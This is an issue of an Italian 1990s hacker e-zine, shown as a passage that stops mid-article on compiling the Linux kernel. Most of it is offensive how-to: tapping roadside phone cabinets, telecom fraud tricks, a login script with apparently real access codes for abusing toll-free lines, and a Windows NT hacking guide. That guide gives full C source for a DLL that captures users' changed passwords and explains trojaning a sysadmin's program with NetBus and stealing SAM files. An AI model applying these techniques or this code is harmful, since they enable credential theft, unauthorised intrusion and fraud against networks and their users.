ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³INTERESSANTI INFO SU TELEFONI E AFFINI³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹CABINE X NAVIGARE GRATISÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

BŠ da dove cominciamo...Volete sapere un modo sicuro x inculare la telekoma?
Come avrete notato in campagna ci sono molte cabine di circa 1,30 m x 50 cm
che raggruppano tutti le linee telefoniche della zona.
Voi non dovete far altro che aprire lo sportello ed applicare ai fili che sono
sulle cabine il cavetto che arriva al modem.Dovete star attenti per• a togliere
il filo ogni volta che vi disconnettete ed Š consigliabile andarci di notte (cos non vi vede nessuno).
Questo sistema per• pu• essere attuato solo da chi abita vicino a quste cabine.

KaOsS

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹CELLULARI E SCHEDE TELEFONICHEÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

Come tutti saprete la TELECOM Š difficile da truffare ,ma ecco qu… un p• di cosette
che possono tornare utili.Partiamo con le cose pi— semplici,inviare SMS a qualunque
cellulare GSM gratuitamente e rimanendo del tutto anonimi. Ecco qui un sito che pu•
tornare utile:

WWW.GSMBOX.COM

Una seconda cosetta semplice Š ricaricare le schede telefoniche, basta soltanto
spruzzare della lacca per capelli sulla striscia mangnetica e succesivamente
passarla su un televisore vecchio,la scheda si ricaricher….

Ora questa cosetta e' riservata soltanto ai possessori di un cellulare ERIKSON con
contratto OMNITEL. Digitare il numero desiderato poi premere velocemente ok crl
e infine of che terrete premuto fino al termine della comunicazione. Il cellulare
si spengner… e voi comunicherete gratuitamente senza spendere una lira. L'unico
inconveniente Š che la OMNITEL dopo qualche settimana ve lo disattiver…. Per ora
finiamo cosi ma presto vi faremo conoscere altre cose su truffare la TELECOM.

Realizzato da {PrOzAcK}

NOTA DI N0bodY88 = queste cose spigate nell'ultimo articolo di {PrOzAcK} mi
sembrava di averle gia' sentite come "leggende metropolitane"
ma quando ho contattato {PrOzAcK} lui mi ha detto che a lui
non sempre, ma alcune volte, funziona, e quindi se avete domande
da fargli...scrivete alla e-zine e vi faremo rispondere da lui

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³GREEN: ma quanti cazz ce ne sono³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ps voglio fare una precisazione e' verissimo che oggi tantissimi che troviamo
on-line sono collegati tramite green di cui cito il piu' famoso Compuserve ma
non e' detto che tutti questi siano phreacker abili molto spesso si tratta di
ragazzi stanchi di pagare le cazz di bollette [ Come gia' in Butcher From Inside
e' stato fatto notare ah ps colgo il momento per farvi un complimento per la
rivista : continuate cosi' che andate forte ] . I green sono molto e sottolineo
molto rischiosi e quindi okkio ad usarli ... Ma poi ognuno fa come cazz vuole
quindi auguri .. Vi consiglio pero' delle precauzioni controllate almeno in
voltaggio della linea o collegatevi raramente non fatelo da casa vostra ...
Bho io i consigli li ho dati quindi posso continuare allegramente , voglio
partire dalle basi x far capire a tutti questo articolo Quindi lo divido in due
parti chi e' gia' preparato vada alla parte due cosi' non vi rompete i coglioni

PARTE 1:
I green sono numeri di telefono che iniziano con il prefisso uno 167 [ ohhhhhhh ]
quindi gratuiti [ riohhhh] sono utililizzati spesso della aziende per i loro cazzi
via internet , e' rischioso usarli perche' se vi beccano la galera e' assicurata ..
Per farvi un esempio di green vi parlero' di quello di Telecom per fare abbonamenti
[ presente il numero verde per fare abbo on-line ] in questo fino a 4 mesi fa era
possibile navigare in internet grazie agli op che avevano lasciato la porta ftp
aperta spettacolare ma ora con il filtraggio di pacchetti tutto cio' non e' + possibile
[ se e' possibile fatemelo notare kokok@tin.it ] [ ps ho notato che il tipo di terminale
e' un ascend e ' che vi sono dei cazz di comandi che puoi dare per vedere le chiamate se
qualuno sa qualche cosa in + mi mandi una mail Grazzzie ] , pausa sigaretta ......
Ok come li trovo usa un bel war-dialer nel nostro sito troverai il PHONETAG che gira su
Windowz e inizia a cercare ....
Ok fatto cio' troverai green a ' manetta ' e divertiti soppratutto a trovare le
passwd del green ps non basta avere il numero .
PARTE 2 : ok ci siamo ho il mio bel green come sono felice , ho la mia passwd
ma cosa manca? La procedura per collegarsi....aspe la cerco....eccola:

COPIA E INCOLLA

proc main
transmit ".^M"
waitfor "SITA"
transmit "NUI 19730001^M"
waitfor "password"
transmit "KHS9NE^M"
waitfor "active"
transmit "2111855^M"
waitfor "Host name:"
transmit "cis^M"
waitfor "ID:"
transmit $USERID,raw
transmit "/go:pppconnect^M"
waitfor "ssword:"
transmit $PASSWORD,raw
transmit "^M"
waitfor "One moment please"
endproc

Ok bella e ora collegatevi e okkio .....
ZeroCool

[ ps voglio fare notare che in mirc di gente disposta a scambiare numeri e account
ne trovate veramente molta ma okkio ai pacchi e se non avete delle precauzioni
quando vi collegate lasciate pure perdere ]
ah ri ps provate questi [ sempre a livello informativo]:

167444888 Telecom ITalia richiede un nunmero x passarvi l' interno di una zona.
167327111 chiede userid e passwd ma non so cosa faccia mandatemi una mail x
favore se qualcuno sa qualcosa in + .
167721111 Tin Europe

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COMPUSERVE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ


Allora raga premetto che x scrivere questo articolo mi son documentato un po'
per scriverlo...ok allora come mi faccio un fake a compuserve????????
mha...
1) o scarico cis26.exe
2) o faccio cosi' [visto che il primo occupa 11mb meglio che spiego il secondo]
ok allora login 177000,5000
e password: Pc*Magnet
e poi vi appare tutto cio'
ok a voi :

CompuServe ASCII Interface - Signup
Thank you for your interest in joining CSi (CompuServe)!
CSi no longer supports sign-ups through this mechanism.
To sign-up to CSi and experience all we have to offer,
call us at 800-848-8199 in the US and Canada between the hours
of 8:00 am and 1:00 am weekdays and 10:00 am and 10:00 pm
weekends Eastern time to receive a FREE start-up kit.
This kit includes free CSi software that will allow you to
sign-up and access CSi Press <CR> for CompuServe
and the Internet. CSi software supports computers with the
Windows 95/NT, Windows 3.1x and Macintosh operating systems.

If you are an airline crew member, please call 1-800-447-8549.

If you are signing up for a corporate account, please call
1-800-226-0928 or 614-718-2185.

If you reside outside the US and Canada, contact the Customer
Service office nearest you to obtain your free start-up kit
with CSi software.

Press <CR> for more !more !

CompuServe

You can locate Customer Service offices and request software
through the CompuServe Web Page at http://world.compuserve.com.

No matter how you request your CSi software, it will be mailed
out promptly to get you online right away.

(If you cannot use the software provided by CompuServe and are
connecting with a terminal emulation program, please contact
Customer Service to request that they complete the sign-up
process for you. In the US and Canada call 800-336-6823.)

Ok poi fate il fake

Province Phone No. Baud Rate Country Network
Milan 39 02 22479532 14.4k 28.8k 33.6k Italy CPS
Rome 39 06 51957347 14.4k 28.8k 33.6k Italy CPS
Bari 39 0805316139 33.6k Italy EQT
Bolzano 39 0471 981783 33.6k Italy EQT
Catania 39 095532557 33.6k Italy EQT
Florence 39 0555015540 14.4k 28.8k 33.6k Italy EQT
Genoa 39 010588162 14.4k 28.8k 33.6k Italy EQT
Naples 39 0815512011 14.4k 28.8k 33.6k Italy EQT
Turin 39 011533554 14.4k 28.8k 33.6k Italy EQT
Venice 39 0415340331 14.4k 28.8k 33.6k Italy EQT
Verona 39 0458002387 14.4k 28.8k 33.6k Italy EQT
Udine 39 0432 295260 33.6k Italy EQT
Ancona 39 0712804597 33.6k Italy EQT
Bergamo 39 035231786 33.6k Italy EQT
Brescia 39 30 2420587 33.6k Italy EQT
Olbia 39 0789 67613 33.6k Italy EQT
Padua 39 0498076801 14.4k 28.8k 33.6k Italy EQT
Parma 39 0521 238460 33.6k Italy EQT

Ps: ho messo anche dentro i numeri italiani di compuserve che ovviamente vi servono...

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³Guida all' Hacking di Windows NT³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Created by: Ax1s

INDICE:

1) WinNT esegue tutti i tipi di file.
2) Usare i trojan
3) I file SAM
4) Diventare root su una sola macchina
5) Conclusioni



L'hacking di WinNT risulta spesso piuttosto semplice (non dimentichiamo che Š
prodotto dalla Microsoft!) in quanto esistono centinaia di exploit che possono
essere utilizzati.
Scriver• qui quelli pi— comuni e che vanno bene quasi in qualsiasi situazione.

1. WinNT esegue tutti i tipi di file.

E' un grosso bug di questo sistema operativo: mi sembra che funzioni fino a winNT4 sp3.
Basta rinominare un file .exe con una qualsiasi altra estensione ed il file verra'
eseguito lo stesso. Provate infatti ad inserire quel file in una riga di un file .bat.
Esso verr… eseguito. Grazie a questo bug Š stato fatto un exploit che riporto qui sotto
ma che trovate dappertutto in rete: Š uno dei pi— efficaci.

Basta compilare questo programmino e rinominarlo come FPNWCLNT.DLL. Questo Š
infatti uno dei file che winnt utilizza all'avvio. Riusciremo cos ad ottenere
l'elenco delle password in un file a nostra scelta!!! Dopo averlo compilato
basta piazzarlo nella dir winnt/system32 e, dopo il riavvio, troveremo le pass
nel file c:\temp\newbies.txt!

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};

static HANDLE fh;

BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\\temp\\newbies.txt", GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "Procedura InitializeChangeNotify avviata\n", 31, &wrote, 0);
return TRUE;
}

LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
struct UNI_STRING *passwd)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;

memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
return 0L;
}

2. Usare i trojan

In questi ultimi tempi stanno uscendo in Internet vari trojan tipo NetBus e
Back Orifice. Questi programmi sono considerati "da lamer" da molti hacker ma
io penso che, se usati con intelligenza, possano essere molto utili anche agli
hacker! Pensate infatti di trovarvi seduti davanti ad una Workstation WinNT ed
avere solo accesso guest; magari non avete neanche accesso fisico al server.
Come fare per ottenere l'accesso root su TUTTA la LAN?? Basta usare la fantasia!
Andate su "Risorse di Rete" ed accedete al server.Quasi sicuramente esso avr…
delle cartelle condivise. Aprite queste cartelle e cercate qualche applicazione
che sapete essere usata spesso dal sysadmin. Usando Silk Rope (il programmino
degli hacker CDC) fondete il .exe di quell' applicazione con il server di NetBus (patch.exe).
Il gioco Š fatto! Quando il sysadmin user… il suo programmino NetBus si installer…
sul WinNT Server e voi sarete padroni di quel computer come se foste seduti davanti.
Una volta dentro baster… usare il metodo Nø1 per ottenere le pass oppure prelevare
i file .SAM come spiegher• nel punto 3.

3. I file SAM

(Da "Enciclopedia dell'Hacking" by Lord Shinva)

Dove si trovano le password in Windows NT?

Da nessuna parte. Windows NT (come anche UNIX) non immagazzina le password,
ma bensi` un hash (valore numerico calcolato in base alla password, dal quale
non si puo` risalire alla stringa originale, in quanto e` solo un numero).

Per crackare gli hash si puo` utilizzare il programma PWDUMP (lo potete
trovare sui siti hacker) e comunque si tratta di un attacco basato su
dizionari, quindi di tipo "brute force" (forza bruta).

Quindi, dicevamo, la domanda giusta sarebbe: "dov'e` l'elenco degli hash?"

La risposta e`: nella directory \WINNT\SYSTEM32\CONFIG c'e` un file chiamato
SAM. E` questo il database che cerchiamo. E` leggibile da tutti gli utenti
(a meno che quel simpaticone del SysAdmin non ci abbia messo lo zampino), ma
comunque non si puo` leggere in quanto bloccato (via sharing) perche` e` in
uso dai componenti di sistema di NT. A questo punto il SysAdmin giubila ed
esulta, ma l'hacker sa dell'esistenza di SAM.SAV che Š il backup di SAM...

Inoltre, durante l'installazione di NT, una copia del SAM viene posta in
\WINNT\REPAIR. Quasi sicuramente troveremo solo gli account Administrator e
Guest, ma credo che Administrator (SysAdmin) sia abbastanza...

A proposito del SAM... se siete completamente pazzi potete anche mettere le vostre
manacce nelle keys del SAM. Per esempio, schedulando il servizio di logon come
LocalSystem e permettendogli di interagire con il desktop, e poi schedulando una
sessione interattiva di regedt32.exe (come LocalSystem) con il quale manipolare
le keys. Ovviamente se non sapete a cosa serve tutto questo sar… meglio non
toccare niente, altrimenti saranno guai grossi...

4. Diventare root su una sola macchina

Nonostante l'obbiettivo di un hacker sia spesso diventare sysadmin su tutta la
rete LAN e quindi sul server, non si deve disprezzare l'ipotesi di diventare
root su una delle workstation. Per farlo ci viene incontro un bel programmino
che sfrutta un grosso bug del sistema operativo. Noi NewBies abbiamo messo per
voi sul nostro sito con il nome secole2.zip (cmq e' anche in questo zip ndN0bodY88).
Per farlo funzionare basta estrarre i 2 file dello zip in una qualsiasi directory
dell'hd ed eseguire il file .exe. Quando questo avr… terminato il suo lavoro vi
baster… riavviare il computer e vedrete che siete stati aggiunti alla lista dei sysadmin!!
Esaminiamo ora i vantaggi di diventare root su una workstation:
- abbiamo pieno accesso a tutti i file dell'HD e possiamo modificarli a nostro piacimento
- possiamo modificare tutte le chiavi del registro e magari, lavorando con le
associazioni dei file ai vari programmi possiamo far eseguire al sysadmin delle
operazioni che non vuole ;-)
- abbiamo la possibilit… di installare tutti i programmi che vogliamo senza che ci
appaia la scritta "per installare il programma sono necessari i privilegi dell'amministratore
di sisitema"
! Quindi possiamo sbizzarrirci ad installare programmi utili a raggiungere
il nostro scopo ultimo (root sul server) e magari anche per installare qualche bel videogioco!!!
Se poi avete accesso fisico al server e riuscite a farvi girare questo bel programmino,
sarete i padroni di tutta la rete!!!

5. Conclusioni

Per concludere vi dar• qualche consiglio.
Prima di incominciare ad hackerare una rete di computer senza quasi sapere
cosa state facendo, raccogliete pi— informazioni possibili su di essa, sui
sysadmin e sui programmi da loro usati. Cercate di scoprire quali sono le
persone che hanno accesso al server per poter poi tentare di far eseguire
loro dei comandi. Quando hackerate cercate di usare la fantasia, non basta
conoscere due o tre exploit per riuscire nell'intento! Cercate di essere
sempre discreti e fate finta di non sapere nemmeno come si accenda un PC.
Per gli exploit su WinNT li potete trovare cercando su www.rootshell.com e
su neworder.box.sk.

Ciaoz AX1S

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³CHI HA PAURA DI NET-BUS E BACK ORIFICE?³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Bhe io no sicuramente odio questi pacchetti preconfezionati , ma dopo una
discussione con Bismark [ il creatore del bisnuke ] un par de sere fa' penso
che e' ovvio sia divertente x chi si avvicina per la prima volta a qualcosa
che somigli vagamente all' hacking... Anche io lo confesso per un par de
giorni mi sono divertito un mondo con quel prog ma in modo diverso : ho
analizzatto i comandi che NET-BUS da' durante la connessione , e soppratutto
quello che riguarda la passwd . Esistono gia' pacchetti preconfezionati per
togliere la passwd agli hosts protetti [ ovvero quando vi collegate e vi
richiede la password ] ma vedremo come possiamo fare da soli allora apriamo
il caro TELNET e mettiamo l' ip della vittima e come porta settiamo 12345
che e' ovviamente quella che net-bus usa per la connessione ok siamo collegati
ed ora scriviamo:

ok in questo modo abbiamo settato la password che volevamo , ricolegghiamoci
con NET-BUS inseriamo quella passwd ed il gioco e' fatto . Ora inseriro' parti
di un articolo preso dalla rivista inter.net che mi ha molto colpito:

Il problema come giustamente puntualizza non sono gli hacker che fanno del
l'intrusione una sfida all' anonimato ; la piaga peggiore e' la pletora di
pirati dell' ultima ora che pensa di diventare hacker usando pacchetti
preconfezionati . A questo reagente aggiungiamo il catalizzatore della leggerezza
di una grande quantita' di utenti che per fretta ,insufficente conoscenza dei
pericoli non controlla cio' che riceve e si ritrova di tutto sul proprio
computer. Il danno e' dovuto in questo caso alla mancanza di profilassi ,
Se e' vero che un cannone fa' piu' male di una zanzara , questa pero' passa
inosservata ed e' in grado di sterminare piu' di una guerra .

Ok perfetto quindi un bel messaggio da parte mia per chi si ostina ad usare
SOLO ED ESCLUSIVAMENTE BO O NET-BUS E COMBINA DEI DANNI ALL' INTERNO DEI PC
INFETTI: SIETE DEI LAMERONI.

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹LINUX [ UNA MIA DOMANDA ]ÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

Allora raga ho comprato la nuovissima Matrox Mistique G200 e non riesco a
trovare i cazz di driver di supporto per linux [ scusate se li chiamo driver
di supporto ma non so proprio come cazz chaimarli ] se qualcuno sa se li hanno
fatti e dove si possono scaricare ringrazio in anticipo ...
ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹LINUX [ NEWS ]ÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

LINUX [ news ]
Allora in questo articolo voglio darvi delle belle novita' per qunto riguarda
i prog che reputo belli x linux. Ok iniziamo:

MESA 3.1 BETA : le open-gl di linux
una libreria grafica che usa le API di OpenGl , usatelo x quake 2 [ la ver. linux ovviamente ]

Gtk See 0.1.4 Image browser
Modello ACD-SEE supporta anche i formati XCF , PSD , XBM

TiMidity 0.2j midi a wave [ programma di conversione ]

X11AMP
Che bello una specie di WinAmp x linux ed e' stabilissimo

Che ne pensate? Io li ho installati e li ritengo spettacolari. Ovviamente non
centrano molto con l'hacking ma mi sembra divertente scriverlo [ se fa schifo ditelo ]
ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³IL KERNEL, QUESTO SCONOSCIUTO!³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Uno degli argomenti che forse terrorizzano di pi— i novellini di Linux Š
capire cosa sia il kernel e come fare a compilarsene uno, processo di per
s‚ abbastanza semplice una volta venuti in possesso di alcune conoscenze di
base... L'intento di questo articolo Š quello di sfatare miti e/o leggende
dall'argomento in questione, fornendovi le dritte giuste (ma spiegandovene
anche il significato, per lo meno ad "alto livello") per portare a compimento
l'operazione in oggetto senza paturnie addizionali... Il mio intento principale
Š quello di favorire la chiarezza a discapito della complessit…, qualit… in ogni
caso non particolarmente necessaria in questa sede.


FACCIAMO LA SUA CONOSCENZA...

Prima di incominciare mi sembra doveroso spiegare cosa sia questo famigerato
kernel e quali sono le sue funzioni principali... Lo potremmo immaginare come
una sorta di "programma a basso livello", che si prende cura dei processi
(ovvero dei programmi in esecuzione) e che funge da interfaccia tra il livello
delle applicazioni e l'hardware sottostante (come vi ho detto ho rinunciato
alla completezza delle definizioni per aumentare la comprensibilit… del tutto);
i suoi compiti principali, oltre a filtrare le richieste dei processi verso
l'hardware, sono quelle di mantenere traccia degli stessi, di riservare a
ciascuno uno spazio nella memoria e di gestire quello che in termini informatici
viene definito come "scheduling", una funzione atta a garantire che tutti i
programmi in esecuzione possano fruire della CPU per le elaborazioni; sui
moderni sistemi operativi siamo abituati a vedere pi— processi in esecuzione
contemporanea (multitasking), ma, in realt…, un solo processo Š attivo nella
CPU rispetto all'unit… di tempo... Ed Š proprio questo il punto: in un dato
momento il programma X Š in esecuzione, ma subito dopo X potrebbe essere
sospeso dallo scheduling per dare un po' di tempo di esecuzione ad Y, per poi
passare a Z o ritornare a X. In pratica a noi sembra che le computazioni dei
vari programmi vengano portate avanti in parallelo, anche se, come vi ho detto,
le cose stanno in modo diverso (spero di aver chiarito il concetto).
Sarete sicuramente giunti, dopo la definizione sopra riportata, alla seguente
conclusione: un sistema operativo non potrebbe funzionare senza il nucleo del
kernel, ed Š per questo che Š cos importante.
Il discorso fino ad ora affrontato era di carattere generale, vediamo ora di
renderlo pi— specifico...



ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹IL KERNEL DI LINUXÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

Il kernel di Linux, sviluppato dall'ormai ultraosannato Linus Torlvalds e da
altri volontari viene innanzitutto distribuito come sorgente in linguaggio c,
e questo richiede sostanzialmente che voi dobbiate compilarlo per poterlo utilizzare
(un listato in linguaggio c non pu• infatti essere eseguito direttamente dal
computer... deve venire prima trasformato in un formato fruibile direttamente
- il formato eseguibile - attraverso una fase che viene detta "compilazione").
Esistono varie versioni del kernel, in quanto questo viene costantemente aggiornato
per migliorarne le prestazioni e/o correggere bachi presenti nelle versioni precedenti;
pi— precisamente esistono in contemporanea due versioni differenti dei sorgenti del
kernel, una assolutamente stabile per gli utenti "normali" e una pi— "sperimentale"
(ma comunque altamente stabile in linea di massima) per gli sviluppatori e gli
smanettoni: attualmente le versioni stabili sono quelle contraddistinte con il
numero di versione 2.0.X, mentre quelle per gli sviluppatori hanno il numero
di versione 2.1.X. A meno che non possediate hardware non supportato dalle versioni
stabili del kernel, sconsiglio agli utenti di utilizzare quelle sperimentali (che,
una volta terminata la fase di testing, ci porteranno alle nuove versioni stabili 2.2.X).
Come discorso generale, per capire se una versione del kernel Š stabile o meno
si osserva il secondo numero di versione (quello in mezzo): numeri pari = stabile,
numeri dispari = sperimentale (infatti 2.0.X Š stabile, 2.1.X Š sperimentale).
La versione stabile pi— recente Š, nel momento in cui sto scrivendo questo
articolo, la 2.0.35 (comunque la 2.0.36 Š gi… dietro l'angolo e potrebbe essere
stata gi… rilasciata mentre leggete questo articolo). Segue ora un metodo esaustivo
per conoscere quali siano le release pi— recenti del kernel, da digitare al prompt
dei comandi una volta collegati alla rete (da Linux, a meno che non disponiate del
programma finger anche in Windows); quello che dovrete digitare Š semplicemente:

finger @ftp.kernel.org

Questo Š quanto appare a me in questo momento:

infectmachine:~> finger @ftp.kernel.org
[linux.kernel.org]

The latest stable version of the Linux kernel is: 2.0.35
The latest *beta* version of the Linux kernel is: 2.1.126

infectmachine:~>
(infectmachine Š il nome della mia macchina).

come potete vedere, la versione stabile pi— recente Š la 2.0.35 .
Ora che sappiamo cosa scaricare utilizziamo ftp su ftp.kernel.org per scaricare
i sorgenti di quello che ci interessa: il nome del file che dovete prendere Š
in questo caso "linux-2.0.35.tar.gz"; la dimensione dello stesso non dovrebbe
superare gli otto mega, con un'oretta di fatica dovreste riuscire a farlo vostro.
Una volta terminato il download siamo pronti ad effettuare la compilazione.

COSA VI SERVE

Oltre al file appena scaricato vi servir… il compilatore gcc (dovreste averlo
gi… installato, in caso contrario fatelo!) e una conoscenza per lo meno
approssimativa del vostro hardware: mi sto in particolar modo riferendo al tipo
di hard disk che si utilizza (IDE o SCSI), stesso discorso per il CD-ROM
(oggigiorno dovrebbero essere tutti IDE o SCSI, tuttavia alcuni rimasugli del
passato utilizzavano un controller proprietario), ma anche i dati inerenti alla
scheda sonora, come ad esempio i numeri di DMA o IRQ. Queste informazioni le
possiamo ottenere "a scrocco" dal caro e amato Windows 9X semplicemente premendo
il pulsante destro su "risorse del computer". Viene molto in aiuto, in questo
caso, il solito foglietto di carta.
Bene, abbiamo tutto quello che ci serve per iniziare: entriamo come root nella
